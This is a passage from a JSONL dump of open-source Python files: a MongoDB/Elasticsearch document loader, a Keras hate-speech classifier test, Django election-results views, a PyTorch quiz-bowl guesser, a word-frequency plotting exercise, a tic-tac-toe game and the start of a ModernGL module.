DocumentsBatch.JSON.html#DocumentsBatch.JSON.ResponseProperties\n\n \"\"\"\n log = get_log('load')\n conn = db().conn()\n to_load = []\n to_remove = []\n for doc in docs_to_load:\n doc = DOC_SCHEMA.to_python(doc)\n if doc['type'] == 'add':\n doc['_id'] = doc['id']\n doc.pop('type')\n log.debug(('to_load: {0}').format(doc))\n to_load.append(doc)\n else:\n log.debug((\"to remove: '{0}'\").format(doc))\n to_remove.append(doc)\n\n if to_load:\n log.debug((\"bulk loading: '{0}' document(s)\").format(len(to_load)))\n conn.documents.insert(to_load)\n for doc in to_load:\n add_to_elasticsearch(doc)\n\n if to_remove:\n doc_ids = [ doc['id'] for doc in to_remove ]\n for doc_id in doc_ids:\n query = dict(_id=doc_id)\n found = conn.documents.find_one(query)\n if found:\n log.debug((\"adding to remove store: '{0}'\").format(query))\n conn.documents_removed.insert(found)\n conn.documents.remove(query)\n\n rc = dict(status='ok', adds=len(to_load), deletes=len(to_remove), error='', warning='')\n return rc\n\n\ndef configure_field(domain, name, field_type):\n \"\"\"Set up the full text indexing and how the type information is handled.\n\n :param domain: Not used for now, possibly with be to collection or db.\n\n :param name: The field inside the batch upload to set the index for.\n\n :param field_type: The type information. Only 'text' is implemented.\n\n I'm going to make it compatible with how Amazon does it. Although for now\n I'm just going to get FTI working using what MongoDB provides.\n\n \"\"\"\n log = get_log('configure_field')\n field_type = field_type.strip().lower()\n log.debug(('domain <{0}> name<{1}> field_type<{2}>').format(domain, name, field_type))\n\n\ndef report():\n \"\"\"Return a list of a documents added and removed by batch uploading.\n\n :returns: a dict.\n\n E.g.:\n\n {\n \"documents\": [\n # A list of documents currently stored from all batch upload\n # so far.\n :\n ],\n \"documents_removed\": [\n # A list of documents that have been removed from all batch\n # uploads so far.\n :\n ]\n }\n\n \"\"\"\n return {'documents': all(), 'documents_removed': removed()}\n\n\ndef remove_all():\n \"\"\"Remove all store documents.\n \"\"\"\n log = get_log('remove_all')\n conn = db().conn()\n conn.documents.drop()\n conn.documents_removed.drop()\n log.warn('all documents have been removed.')\n get_es().hard_reset()\n log.warn('All indexes removed from elasticsearch.')","sub_path":"pycfiles/nozama_cloudsearch_data-1.1.3-py2.7/document.py","file_name":"document.py","file_ext":"py","file_size_in_byte":6964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"620122484","text":"# Based on https://github.com/ybalcanci/Hate-Speech-Detector\nimport warnings\n\nfrom keras import utils\nfrom sklearn.preprocessing import LabelEncoder\n\nwarnings.simplefilter(action='ignore', category=FutureWarning)\nimport numpy as np\nimport pickle\n\n#stderr = sys.stderr\n#sys.stderr = open(os.devnull, 'w')\nfrom tensorflow import keras\nfrom df.loader import load_english_test\nfrom preprocessing.pl.text_preprocessing import TextPreprocessor\n\n\n#load model\nmodel = keras.models.load_model(r\"..\\..\\model\\en\\rnn_model2\")\n\ndf = load_english_test()\n\nTextPreprocessor().clean_data_frame(df)\n\ntest_posts = df['tweet'][0:]\n\nwith open(r\"..\\..\\model\\en\\rnn_tokenizer\", 'rb') as handle:\n tokenize = pickle.load(handle)\n\nx_test = tokenize.texts_to_matrix(test_posts)\n\ntest_posts = df['tweet']\ntest_tags = df['label']\n\n\nencoder = LabelEncoder()\nencoder.fit(test_tags)\ny_test = encoder.transform(test_tags)\nnum_classes = np.max(y_test) + 1\ny_test = utils.to_categorical(y_test, num_classes)\n\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import classification_report\n\ny_pred = model.predict(x_test)\n\nfor i in range(len(y_test)):\n if(y_pred[i][0] > y_pred[i][1]):\n y_pred[i][0] = 1\n y_pred[i][1] = 0\n else:\n y_pred[i][0] = 0\n y_pred[i][1] = 1\n\nprint(encoder.inverse_transform([0]))\nprint(encoder.inverse_transform([1]))\nprint(y_pred[:10])\nprint(y_test[:10])\nprint('accuracy %s' % accuracy_score(y_pred, y_test))\nprint(classification_report(y_test, y_pred))\n","sub_path":"src/main/python/tests/en/RNN_test.py","file_name":"RNN_test.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"191600844","text":"\"\"\"voting views.\"\"\"\n\n# pylint: disable=too-many-ancestors\n\nimport datetime\nimport email\n\nfrom django.db.models import Q\nfrom django.http import Http404, HttpResponse\nfrom django.shortcuts import get_object_or_404, redirect, render\nfrom django.utils import timezone\nfrom django.views.generic import DetailView, ListView\n\nfrom .models import Election, Statement, Votetaker\n\n\ndef home(request):\n \"\"\"Display the home page.\"\"\"\n return render(request, \"voting/home.html\", {})\n\n\ndef votetakers(request):\n \"\"\"List the votetakers.\"\"\"\n return render(\n request, \"voting/votetakers.html\", {\n \"active_votetakers\":\n Votetaker.objects.filter(user__is_active=True),\n \"retired_votetakers\":\n Votetaker.objects.filter(user__is_active=False),\n }\n )\n\n\nclass StatementList(ListView):\n \"\"\"List the statements.\"\"\"\n model = Statement\n\n\nclass StatementView(DetailView):\n \"\"\"View a statement.\"\"\"\n model = Statement\n\n def get_object(self, queryset=None):\n if queryset is None:\n queryset = self.get_queryset()\n try:\n return queryset.get(\n release_date=self.kwargs[\"release_date\"],\n slug=self.kwargs[\"slug\"],\n )\n except Statement.DoesNotExist:\n raise Http404(\"Statement not found\")\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n message = email.message_from_string(self.object.statement)\n context[\"message\"] = message\n context[\"body\"] = message.get_payload()\n return context\n\n\ndef statement_raw(request, release_date=None, slug=None):\n \"\"\"Return the raw text of a statement.\"\"\"\n return HttpResponse(\n get_object_or_404(\n Statement,\n release_date=release_date,\n slug=slug\n ).statement,\n content_type=\"text/plain; charset=utf-8\"\n )\n\n\ndef statement_by_msgid(request, msgid=None):\n \"\"\"Return a redirect to the proper URL for a statement.\"\"\"\n if msgid.endswith(\".txt\"):\n msgid = msgid[:-4]\n msgid = \"<\" + msgid + \">\"\n return redirect(\n get_object_or_404(Statement, msgid=msgid).get_raw_url(),\n permanent=True\n )\n\n\nclass ResultList(ListView):\n \"\"\"List the election results.\"\"\"\n model = Election\n template_name = \"voting/result_list.html\"\n\n def get_queryset(self):\n queryset = Election.objects.filter(status=Election.RESULT).exclude(\n hidden=True).order_by(\"-result_date\")\n if \"non-uk\" in self.request.GET:\n queryset = queryset.exclude(uk_vote=True)\n else:\n queryset = queryset.exclude(uk_vote=False)\n if self.request.GET.get(\"votetaker\", None):\n queryset = queryset.filter(\n votetaker__user__username=self.request.GET[\"votetaker\"])\n queryset = queryset.defer(\"proposal\", \"cfv\")\n queryset = queryset.select_related(\"votetaker\", \"votetaker__user\")\n return queryset\n\n\nclass ResultView(DetailView):\n \"\"\"View an election result.\"\"\"\n model = Election\n template_name = \"voting/result_detail.html\"\n\n def get_object(self, queryset=None):\n if queryset is None:\n queryset = self.get_queryset()\n queryset = queryset.filter(status=Election.RESULT)\n try:\n if self.kwargs[\"key\"].isdigit():\n return queryset.get(id=int(self.kwargs[\"key\"]))\n return queryset.get(shortname=self.kwargs[\"key\"])\n except Election.DoesNotExist:\n raise Http404(\"Election result not found\")\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n message = email.message_from_string(self.object.result)\n context[\"message\"] = message\n context[\"body\"] = message.get_payload()\n return context\n\n\ndef result_by_msgid(request, msgid=None):\n \"\"\"Return a redirect to the proper URL for a result.\"\"\"\n if msgid.endswith(\".txt\"):\n msgid = msgid[:-4]\n msgid = \"<\" + msgid + \">\"\n return redirect(\n get_object_or_404(Election, status=Election.RESULT,\n result_msgid=msgid).get_raw_result_url(),\n permanent=True\n )\n\n\ndef result_raw(request, key=None):\n \"\"\"Return the raw text of a statement.\"\"\"\n if key.isdigit():\n result = get_object_or_404(Election, status=Election.RESULT,\n id=key).result\n else:\n result = get_object_or_404(Election, status=Election.RESULT,\n shortname=key).result\n return HttpResponse(result, content_type=\"text/plain; charset=utf-8\")\n\n\ndef missing(request):\n \"\"\"View the list of missing files.\"\"\"\n cutoff = (datetime.datetime.now() - datetime.timedelta(days=20)).date()\n results = Election.objects.exclude(hidden=True).exclude(\n result_date__gte=cutoff).filter(\n result=\"\", status=Election.RESULT).order_by(\"-result_date\")\n cfvs = Election.objects.exclude(hidden=True).exclude(\n cfv_date__gte=cutoff).filter(\n cfv=\"\", status__in=(Election.ACTIVE, Election.COUNT,\n Election.RESULT)).order_by(\n \"-cfv_date\", \"-result_date\")\n return render(\n request, \"voting/missing.html\", {\n \"results\": results,\n \"cfvs\": cfvs,\n }\n )\n\n\ndef status(request):\n \"\"\"View the list of currently-active CFVs.\"\"\"\n today = timezone.now().date()\n count = Election.objects.exclude(hidden=True).filter(\n Q(status=Election.COUNT) | Q(\n status=Election.ACTIVE, cfv_end_date__lt=today)\n ).order_by(\"-cfv_end_date\")\n active = Election.objects.exclude(hidden=True).filter(\n status=Election.ACTIVE, cfv_end_date__gte=today\n ).order_by(\"-cfv_end_date\")\n setup = Election.objects.exclude(hidden=True).filter(\n status=Election.SETUP)\n return render(\n request, \"voting/status.html\", {\n \"count\": count,\n \"active\": active,\n \"setup\": setup,\n }\n )\n\n\ndef pgpkeys(request):\n \"\"\"View the list of votetakers' PGP keys.\"\"\"\n return render(\n request, \"voting/pgpkeys.html\", {\n \"votetakers\": Votetaker.objects.filter(\n user__is_active=True).exclude(pgpkey=\"\"),\n }\n )\n","sub_path":"voting/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"628290469","text":"import re\nimport os\nimport shutil\nimport time\nimport pickle\nfrom typing import List, Optional, Dict\n\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch.nn import functional as F\nfrom torch.optim import Adam, lr_scheduler\n\nfrom torchtext.data.field import Field\nfrom torchtext.data.iterator import Iterator\n\nfrom qanta import qlogging\nfrom qanta.torch.dataset import QuizBowl\nfrom qanta.config import conf\nfrom qanta.guesser.abstract import AbstractGuesser\nfrom qanta.datasets.abstract import QuestionText\nfrom qanta.torch import (\n BaseLogger, TerminateOnNaN, EarlyStopping, ModelCheckpoint,\n MaxEpochStopping, TrainingManager\n)\n\n\nlog = qlogging.get(__name__)\n\n\nCUDA = torch.cuda.is_available()\n\n\ndef create_save_model(model):\n def save_model(path):\n torch.save(model.state_dict(), path)\n return save_model\n\n\n\nqb_patterns = {\n '\\n',\n ', for 10 points,',\n ', for ten points,',\n '--for 10 points--',\n 'for 10 points, ',\n 'for 10 points--',\n 'for ten points, ',\n 'for 10 points ',\n 'for ten points ',\n ', ftp,'\n 'ftp,',\n 'ftp',\n '(*)'\n}\nre_pattern = '|'.join([re.escape(p) for p in qb_patterns])\nre_pattern += r'|\\[.*?\\]|\\(.*?\\)'\n\n\nclass DanEncoder(nn.Module):\n def __init__(self, embedding_dim, n_hidden_layers, n_hidden_units, dropout_prob):\n super(DanEncoder, self).__init__()\n encoder_layers = []\n for i in range(n_hidden_layers):\n if i == 0:\n input_dim = embedding_dim\n else:\n input_dim = n_hidden_units\n\n encoder_layers.extend([\n nn.Linear(input_dim, n_hidden_units),\n nn.BatchNorm1d(n_hidden_units),\n nn.ELU(),\n nn.Dropout(dropout_prob),\n ])\n self.encoder = nn.Sequential(*encoder_layers)\n\n def forward(self, x_array):\n return self.encoder(x_array)\n\n\nclass TiedModel(nn.Module):\n def __init__(self, text_field: Field, n_classes,\n init_embeddings=True, emb_dim=300,\n n_hidden_units=1000, n_hidden_layers=1, nn_dropout=.265, sm_dropout=.158):\n super(TiedModel, self).__init__()\n vocab = text_field.vocab\n self.vocab_size = len(vocab)\n self.emb_dim = emb_dim\n self.n_classes = n_classes\n self.n_hidden_units = n_hidden_units\n self.n_hidden_layers = n_hidden_layers\n self.nn_dropout = nn_dropout\n self.sm_dropout = sm_dropout\n\n self.dropout = nn.Dropout(nn_dropout)\n pad_idx = vocab.stoi[text_field.pad_token]\n self.general_embeddings = nn.Embedding(self.vocab_size, emb_dim, padding_idx=pad_idx)\n self.qb_embeddings = nn.Embedding(self.vocab_size, emb_dim, padding_idx=pad_idx)\n self.wiki_embeddings = nn.Embedding(self.vocab_size, emb_dim, padding_idx=pad_idx)\n qb_mask = torch.cat([torch.ones(1, 600), torch.zeros(1, 300)], dim=1)\n wiki_mask = torch.cat([torch.ones(1, 300), torch.zeros(1, 300), torch.ones(1, 300)], dim=1)\n self.combined_mask = torch.cat([qb_mask, wiki_mask], dim=0).float().cuda()\n\n if init_embeddings:\n mean_emb = vocab.vectors.mean(0)\n vocab.vectors[vocab.stoi[text_field.unk_token]] = mean_emb\n self.general_embeddings.weight.data = vocab.vectors.cuda()\n self.qb_embeddings.weight.data = vocab.vectors.cuda()\n self.wiki_embeddings.weight.data = vocab.vectors.cuda()\n\n # One averaged embedding for each of general, qb, and wiki\n self.encoder = DanEncoder(3 * emb_dim, self.n_hidden_layers, self.n_hidden_units, self.nn_dropout)\n self.classifier = nn.Sequential(\n nn.Linear(self.n_hidden_units, n_classes),\n nn.BatchNorm1d(n_classes),\n nn.Dropout(self.sm_dropout)\n )\n\n def forward(self, input_: Variable, lengths, qnums):\n \"\"\"\n :param input_: [batch_size, seq_len] of word indices\n :param lengths: Length of each example\n :param qnums: QB qnum if a qb question, otherwise -1 for wikipedia, used to get domain as source/target\n :return:\n \"\"\"\n if not isinstance(lengths, Variable):\n lengths = Variable(lengths.float(), volatile=not self.training)\n\n g_embed = self.general_embeddings(input_)\n g_embed = g_embed.sum(1) / lengths.float().view(input_.size()[0], -1)\n g_embed = self.dropout(g_embed)\n\n qb_embed = self.qb_embeddings(input_)\n qb_embed = qb_embed.sum(1) / lengths.float().view(input_.size()[0], -1)\n qb_embed = self.dropout(qb_embed)\n\n wiki_embed = self.wiki_embeddings(input_)\n wiki_embed = wiki_embed.sum(1) / lengths.float().view(input_.size()[0], -1)\n wiki_embed = self.dropout(wiki_embed)\n\n # Need to use qnum to mask either qb or wiki embeddings here\n concat_embed = torch.cat([g_embed, qb_embed, wiki_embed], dim=1)\n mask = Variable(self.combined_mask[(qnums < 0).long()])\n masked_embed = concat_embed * mask\n\n encoded = self.encoder(masked_embed)\n return self.classifier(encoded)\n\n\nclass TiedGuesser(AbstractGuesser):\n def __init__(self):\n super(TiedGuesser, self).__init__()\n guesser_conf = conf['guessers']['Tied']\n self.gradient_clip = guesser_conf['gradient_clip']\n self.n_hidden_units = guesser_conf['n_hidden_units']\n self.n_hidden_layers = guesser_conf['n_hidden_layers']\n self.lr = guesser_conf['lr']\n self.nn_dropout = guesser_conf['nn_dropout']\n self.sm_dropout = guesser_conf['sm_dropout']\n self.batch_size = guesser_conf['batch_size']\n self.use_wiki = guesser_conf['use_wiki']\n self.n_wiki_sentences = guesser_conf['n_wiki_sentences']\n self.wiki_title_replace_token = guesser_conf['wiki_title_replace_token']\n self.lowercase = guesser_conf['lowercase']\n self.tied_l2 = guesser_conf['tied_l2']\n self.encoder_type = guesser_conf['encoder_type']\n\n self.page_field: Optional[Field] = None\n self.qnum_field: Optional[Field] = None\n self.text_field: Optional[Field] = None\n self.n_classes = None\n self.emb_dim = None\n self.kuro_trial_id = None\n\n self.model = None\n self.optimizer = None\n self.criterion = None\n self.scheduler = None\n\n @property\n def ans_to_i(self):\n return self.page_field.vocab.stoi\n\n @property\n def i_to_ans(self):\n return self.page_field.vocab.itos\n\n def parameters(self):\n params = conf['guessers']['Tied'].copy()\n params['kuro_trial_id'] = self.kuro_trial_id\n return params\n\n def train(self, training_data):\n log.info('Loading Quiz Bowl dataset')\n train_iter, val_iter, dev_iter = QuizBowl.iters(\n batch_size=self.batch_size, lower=self.lowercase,\n use_wiki=self.use_wiki, n_wiki_sentences=self.n_wiki_sentences,\n replace_title_mentions=self.wiki_title_replace_token\n )\n log.info(f'N Train={len(train_iter.dataset.examples)}')\n log.info(f'N Test={len(val_iter.dataset.examples)}')\n fields: Dict[str, Field] = train_iter.dataset.fields\n self.page_field = fields['page']\n self.n_classes = len(self.ans_to_i)\n self.qnum_field = fields['qnum']\n self.text_field = fields['text']\n self.emb_dim = self.text_field.vocab.vectors.shape[1]\n log.info(f'Vocab={len(self.text_field.vocab)}')\n\n log.info('Initializing Model')\n self.model = TiedModel(\n self.text_field, self.n_classes, emb_dim=self.emb_dim,\n n_hidden_units=self.n_hidden_units, n_hidden_layers=self.n_hidden_layers,\n nn_dropout=self.nn_dropout, sm_dropout=self.sm_dropout\n )\n if CUDA:\n self.model = self.model.cuda()\n log.info(f'Parameters:\\n{self.parameters()}')\n log.info(f'Model:\\n{self.model}')\n self.optimizer = Adam(self.model.parameters(), lr=self.lr)\n self.criterion = nn.CrossEntropyLoss()\n self.scheduler = lr_scheduler.ReduceLROnPlateau(self.optimizer, patience=5, verbose=True, mode='max')\n\n manager = TrainingManager([\n BaseLogger(log_func=log.info), TerminateOnNaN(), EarlyStopping(monitor='test_acc', patience=10, verbose=1),\n MaxEpochStopping(100), ModelCheckpoint(create_save_model(self.model), '/tmp/tied.pt', monitor='test_acc')\n ])\n\n log.info('Starting training')\n try:\n import socket\n from kuro import Worker\n worker = Worker(socket.gethostname())\n experiment = worker.experiment(\n 'guesser', 'Tied', hyper_parameters=conf['guessers']['Tied'],\n metrics=[\n 'train_acc', 'train_loss', 'test_acc', 'test_loss'\n ], n_trials=5\n )\n trial = experiment.trial()\n if trial is not None:\n self.kuro_trial_id = trial.id\n except ModuleNotFoundError:\n trial = None\n\n epoch = 0\n while True:\n self.model.train()\n train_acc, train_loss, train_time = self.run_epoch(train_iter)\n\n self.model.eval()\n test_acc, test_loss, test_time = self.run_epoch(val_iter)\n\n stop_training, reasons = manager.instruct(\n train_time, train_loss, train_acc,\n test_time, test_loss, test_acc\n )\n\n if trial is not None:\n trial.report_metric('test_acc', test_acc, step=epoch)\n trial.report_metric('test_loss', test_loss, step=epoch)\n trial.report_metric('train_acc', train_acc, step=epoch)\n trial.report_metric('train_loss', train_loss, step=epoch)\n\n if stop_training:\n log.info(' '.join(reasons))\n break\n else:\n self.scheduler.step(test_acc)\n epoch += 1\n\n def run_epoch(self, iterator: Iterator):\n is_train = iterator.train\n batch_accuracies = []\n batch_losses = []\n epoch_start = time.time()\n for batch in iterator:\n text, lengths = batch.text\n page = batch.page\n qnums = batch.qnum.cuda()\n\n if is_train:\n self.model.zero_grad()\n\n out = self.model(text, lengths, qnums)\n _, preds = torch.max(out, 1)\n accuracy = torch.mean(torch.eq(preds, page).float()).data[0]\n batch_loss = self.criterion(out, page)\n if self.tied_l2 != 0:\n w_general = self.model.general_embeddings.weight\n w_source = self.model.wiki_embeddings.weight\n w_target = self.model.qb_embeddings.weight\n tied_weight_l2 = self.tied_l2 / 2 * (\n (w_general ** 2).sum() +\n ((w_source - w_general) ** 2).sum() +\n ((w_target - w_general) ** 2).sum()\n )\n batch_loss += tied_weight_l2\n if is_train:\n batch_loss.backward()\n torch.nn.utils.clip_grad_norm(self.model.parameters(), self.gradient_clip)\n self.optimizer.step()\n\n batch_accuracies.append(accuracy)\n batch_losses.append(batch_loss.data[0])\n\n epoch_end = time.time()\n\n return np.mean(batch_accuracies), np.mean(batch_losses), epoch_end - epoch_start\n\n def guess(self, questions: List[QuestionText], max_n_guesses: Optional[int]):\n examples = [self.text_field.preprocess(q) for q in questions]\n text, lengths = self.text_field.process(examples, None, False)\n qnums = self.qnum_field.process([0 for _ in questions]).cuda()\n guesses = []\n out = self.model(text, lengths, qnums)\n probs = F.softmax(out)\n scores, preds = torch.max(probs, 1)\n scores = scores.data.cpu().numpy()\n preds = preds.data.cpu().numpy()\n\n for p, s in zip(preds, scores):\n guesses.append([(self.i_to_ans[p], s)])\n\n return guesses\n\n def save(self, directory: str):\n shutil.copyfile('/tmp/tied.pt', os.path.join(directory, 'tied.pt'))\n with open(os.path.join(directory, 'tied.pkl'), 'wb') as f:\n pickle.dump({\n 'page_field': self.page_field,\n 'text_field': self.text_field,\n 'qnum_field': self.qnum_field,\n 'n_classes': self.n_classes,\n 'emb_dim': self.emb_dim,\n 'gradient_clip': self.gradient_clip,\n 'n_hidden_units': self.n_hidden_units,\n 'n_hidden_layers': self.n_hidden_layers,\n 'lr': self.lr,\n 'nn_dropout': self.nn_dropout,\n 'sm_dropout': self.sm_dropout,\n 'batch_size': self.batch_size,\n 'use_wiki': self.use_wiki,\n 'n_wiki_sentences': self.n_wiki_sentences,\n 'wiki_title_replace_token': self.wiki_title_replace_token,\n 'lowercase': self.lowercase,\n 'tied_l2': self.tied_l2,\n 'encoder_type': self.encoder_type\n }, f)\n\n @classmethod\n def load(cls, directory: str):\n with open(os.path.join(directory, 'tied.pkl'), 'rb') as f:\n params = pickle.load(f)\n\n guesser = TiedGuesser()\n guesser.page_field = params['page_field']\n guesser.text_field = params['text_field']\n guesser.qnum_field = params['qnum_field']\n guesser.n_classes = params['n_classes']\n guesser.emb_dim = params['emb_dim']\n guesser.gradient_clip = params['gradient_clip']\n guesser.n_hidden_units = params['n_hidden_units']\n guesser.n_hidden_layers = params['n_hidden_layers']\n guesser.lr = params['lr']\n guesser.nn_dropout = params['nn_dropout']\n guesser.sm_dropout = params['sm_dropout']\n guesser.use_wiki = params['use_wiki']\n guesser.n_wiki_sentences = params['n_wiki_sentences']\n guesser.wiki_title_replace_token = params['wiki_title_replace_token']\n guesser.lowercase = params['lowercase']\n guesser.tied_l2 = params['tied_l2']\n guesser.encoder_type = params['encoder_type']\n guesser.model = TiedModel(\n guesser.text_field, guesser.n_classes,\n init_embeddings=False, emb_dim=guesser.emb_dim\n )\n guesser.model.load_state_dict(torch.load(\n os.path.join(directory, 'tied.pt'), map_location=lambda storage, loc: storage\n ))\n guesser.model.eval()\n if CUDA:\n guesser.model = guesser.model.cuda()\n return guesser\n\n @classmethod\n def targets(cls):\n return ['tied.pt', 'tied.pkl']\n","sub_path":"qanta/guesser/tied.py","file_name":"tied.py","file_ext":"py","file_size_in_byte":14842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"557222713","text":"#出現頻度が高い10語とその出現頻度をグラフ(例えば棒グラフなど)で表示せよ.\n\nfrom knock30 import make_morpheme\nfrom collections import defaultdict\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nf = open('neko.txt.mecab', 'r')\nm = make_morpheme(f)\ndic_surface = defaultdict(lambda: 0)\n\nfor i in m:\n if i['pos'] != '記号':\n dic_surface[i['surface']] += 1\n\nf.close()\n\nwords = sorted(dic_surface.items(), key = lambda x:x[1], reverse = True)\nans = np.array([i[1] for i in words[:10]])\nleft = np.array([i[0] for i in words[:10]])\n\n#確認\nprint(ans)\nprint(left)\n\nplt.rcParams[\"font.family\"] = \"Hiragino sans\"\nfig = plt.figure()\nax = fig.add_subplot(111, title = '出現頻度の高い単語', ylabel = '頻度', xlabel = '単語')\nplt.bar(left, ans)\nplt.show()","sub_path":"suzuki/chapter04/knock36.py","file_name":"knock36.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"182338279","text":"class CeldaOcupada (Exception):\n def __init__(self):\n Exception.__init__(self, \"la celda esta ocupada\")\n\n\nclass Tablero_Lleno (Exception):\n def __init__(self):\n Exception.__init__(self, \"la tabla esta llena\")\n\n\nclass Jugador_Descalificado (Exception):\n def __init__(self):\n Exception.__init__(self, \"Un jugador ha sido descalificado. Partida terminada\")\n\n\n\nclass Jugador:\n def __init__(self,nombre, tipoficha):\n self.__nombre = nombre\n self.__tipo_ficha = tipoficha\n self.__puntuacion = 0\n \n def __str__(self):\n return (self.__nombre + \" \" + self.__tipo_ficha + \" \" + str(self.__puntuacion))\n \n def get_nombre(self) :\n return self.__nombre\n\n def get_tipo_ficha(self):\n return self.__tipo_ficha\n\n def get_puntuacion(self):\n return self.__puntuacion\n\n def actualiza_puntuacion(self):\n self.__puntuacion = self.__puntuacion + 1\n\n\nclass Celda:\n def __init__(self, i, j):\n self.__columna = int(j)\n self.__fila = int(i)\n self.__esta_vacia = True\n self.__ficha = \" \"\n def __str__(self):\n if (self.__esta_vacia):\n return (\" \")\n else:\n return (self.__ficha)\n\n def asignar_ficha(self, ficha):\n if (self.__esta_vacia):\n self.__ficha = ficha\n self.__esta_vacia = False\n else:\n raise CeldaOcupada\n \n def reiniciar_celda(self):\n self.__esta_vacia = True\n self.__ficha = None \n def get_tipo_ficha(self):\n return self.__ficha\n\nclass Tablero:\n def __init__(self):\n self.__ancho = 3\n self.__alto = 3\n self.__matriz_celdas = [] \n self.__numero_fichas = 0\n\n for i in range(self.__alto):\n linea = []\n for j in range(self.__ancho):\n linea.append(Celda(i,j))\n self.__matriz_celdas.append(linea)\n \n\n def __str__(self):\n salida = \"\"\n for linea in self.__matriz_celdas:\n for celda in linea:\n salida = salida + celda.get_tipo_ficha() + \" \"\n salida = salida + \"\\n\" \n return salida\n\n \n\n def poner_ficha(self,i,j,ficha):\n \n if (self.__numero_fichas < self.__ancho*self.__alto):\n self.__matriz_celdas[i][j].asignar_ficha(ficha)\n self.__numero_fichas = self.__numero_fichas + 1\n else:\n raise Tablero_Lleno()\n\n\n def reiniciar_tablero(self):\n self.__numero_fichas = 0\n self.__ganador = None\n for i in range(self.__alto):\n for j in range(self.__ancho):\n self.__matriz_celdas[i][j].reiniciar_ficha() \n \n def hay_tres_en_raya(self):\n ## combinaciones posibles \n posibles = [\"00:01:02\",\"00:11:22\",\"10:11:12\",\"20:21:22\",\"00:10:20\",\"01:11:21\",\"02:12:22\",\"02:11:20\"]\n \n for posible in posibles:\n coordenadas = posible.split(\":\")\n fichas = [] # metemos las fichas de las coordenadas, 3 en total\n \n for cordenada in coordenadas:\n fichas.append(self.__matriz_celdas[int(cordenada[0])][int(cordenada[1])].get_tipo_ficha()) \n ## comprobamos que las fichas sean iguales:\n if ((fichas[0] == fichas[1] and fichas[1] == fichas[2]) and (fichas[1] != \" \" and fichas[0] != \" \" and fichas[2] != \" \")): # hay 3 en hay_tres_en_raya\n self.__ganador = fichas[0]\n return True # devolvemos la ficha ganadora\n return False\n\n def get_numero_de_fichas (self):\n return self.__numero_fichas\n\n def esta_lleno(self):\n return (self.__numero_fichas == 9)\n\nclass Partida:\n def __init__(self):\n self.__partida_terminada = False\n self.__ganador = None\n self.__tablero = Tablero()\n\n # Crear jugadores\n nombre1 = input(\"dame el nombre del Jugador 1 (ficha X)\")\n nombre2 = input(\"dame el nombre del Jugador 2 (ficha O)\")\n\n self.__jugador1 = Jugador(nombre1,\"X\")\n self.__jugador2 = Jugador(nombre2, \"0\")\n\n def reiniciar_partida(self):\n self.__tablero = Tablero()\n self.__partida_terminada = False\n\n def mover_ficha(self, jugador):\n \n numer_max_intentos = 3\n if (isinstance(jugador,Jugador)):\n print (\"jugador \" + jugador.get_nombre() + \" elige celda\")\n intentos = 0\n termina = False\n \n while (not termina and intentos < numer_max_intentos):\n lleno =(Tablero_Lleno)\n ocupado = (CeldaOcupada)\n try: \n i = int(input(\"fila\"))\n j = int(input(\"columna\"))\n if (i > 2 or j > 2):\n print(\"has fallado\")\n else:\n self.__tablero.poner_ficha(i,j,jugador.get_tipo_ficha())\n termina = True\n except lleno:\n print(\"HA HABIDO UN EMPATE JAJA SALUDOS\")\n reinicio = input(\"Quieres empezar otra partida S/N\")\n if(reinicio == \"s\"):\n self.reiniciar_partida()\n else:\n self.termina_partida()\n termina = True\n except ocupado:\n print (\"Ha habido un error. Intentalo de nuevo.\")\n finally:\n intentos = intentos + 1\n \n if (intentos == 3): \n # descalificar jugador por demasiados intentos\n raise Jugador_Descalificado()\n else:\n raise Exception(\"Error desconocido\")\n \n\n \n\n def set_ganador(self, ganador):\n self.__ganador = ganador\n \n def termina_partida(self):\n self.__partida_terminada = True\n\n\n def imprime_ganador(self):\n print (\"GANADOR\", self.__ganador)\n\n\n def jugar_partida(self):\n while (not(self.__partida_terminada) and not(self.__tablero.hay_tres_en_raya()) and not(self.__tablero.esta_lleno())):\n print(self.__tablero)\n self.mover_ficha(self.__jugador1)\n print(self.__tablero)\n if (self.__tablero.hay_tres_en_raya()):\n self.set_ganador(self.__jugador1)\n self.termina_partida()\n self.imprime_ganador()\n reinicio = input(\"Quieres empezar otra partida S/N\")\n if(reinicio == \"s\"):\n self.reiniciar_partida()\n else:\n self.termina_partida()\n else: # si no hay 3 en raya, que mueva el siguiente jugador\n self.mover_ficha(self.__jugador2)\n if (self.__tablero.hay_tres_en_raya()):\n self.set_ganador(self.__jugador2)\n self.termina_partida()\n self.imprime_ganador()\n reinicio = input(\"Quieres empezar otra partida S/N\")\n if(reinicio == \"s\"):\n self.reiniciar_partida()\n else:\n self.termina_partida()\n\n\ndef main():\n partida = Partida()\n partida.jugar_partida()\n\nif (__name__ == \"__main__\"):\n main()","sub_path":"3enraya.py","file_name":"3enraya.py","file_ext":"py","file_size_in_byte":6349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"401640167","text":"'''\n ModernGL common\n'''\n\n# pylint: disable=too-few-public-methods, using-constant-test\n\ntry:\n from ModernGL import mgl\nexcept ImportError:\n pass\n\n\nif False:\n mgl.BLEND = 'BLEND'\n mgl.DEPTH_TEST = 'DEPTH_TEST'\n mgl.CULL_FACE = 'CULL_FACE'\n mgl.MULTISAMPLE = 'MULTISAMPLE'\n\n mgl.TRIANGLES = 'TRIANGLES'\n mgl.TRIANGLE_STRIP = 'TRIANGLE_STRIP'\n mgl.TRIANGLE_FAN = 'TRIANGLE_FAN'\n mgl.LINES = 'LINES'\n mgl.LINE_STRIP = 'LINE_STRIP'\n 